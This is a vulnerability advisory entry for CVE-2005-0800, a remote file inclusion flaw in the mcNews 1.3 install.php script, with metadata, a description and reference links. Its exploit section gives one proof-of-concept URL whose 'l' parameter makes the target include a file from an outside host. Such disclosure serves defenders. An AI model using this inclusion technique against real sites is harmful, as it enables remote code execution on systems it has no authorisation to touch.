McNews install.php Remote Arbitrary File Inclusion Vulnerability

Vulnerability ID: 1108543; Vulnerability type: Input validation
Published: 2005-03-17; Updated: 2006-09-28
CVE ID: CVE-2005-0800; CNNVD-ID: CNNVD-200505-756
Platform: PHP; CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/25232
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-756
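|Vulnerability details
mcNews is a script system that lets users post news on the web. It runs on Linux and Unix operating systems as well as Microsoft Windows. mcNews contains a remote file inclusion vulnerability: the application fails to properly sanitize user-supplied input to the install.php script, so an attacker can include arbitrary files through that input, leading to attacks such as cross-site scripting.
|Exploit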
source: http://www.securityfocus.com/bid/12835/info

mcNews is reportedly affected by a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the 'install.php' script.

This issue is reported to affect mcNews versions 1.3 and prior. 

http://www.example.com/path/to/mcnews/admin/install.php?l=http://www.example.com
|References

Source: BUGTRAQ
Name: 20050317PHPmcNewsarbitraryfileinclusion
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=111108900102438&w=2
Source: XF
Name: mcnews-install-file-include(19726)
Link: http://xforce.iss.net/xforce/xfdb/19726
Source: BID
Name: 12835
Link: http://www.securityfocus.com/bid/12835
Source: BUGTRAQ
Name: 20060906mcNewsv1.3-RemoteFileInclude
Link: http://www.securityfocus.com/archive/1/archive/1/445606/100/0/threaded
Source: SECUNIA
Name: 14528
Link: http://secunia.com/advisories/14528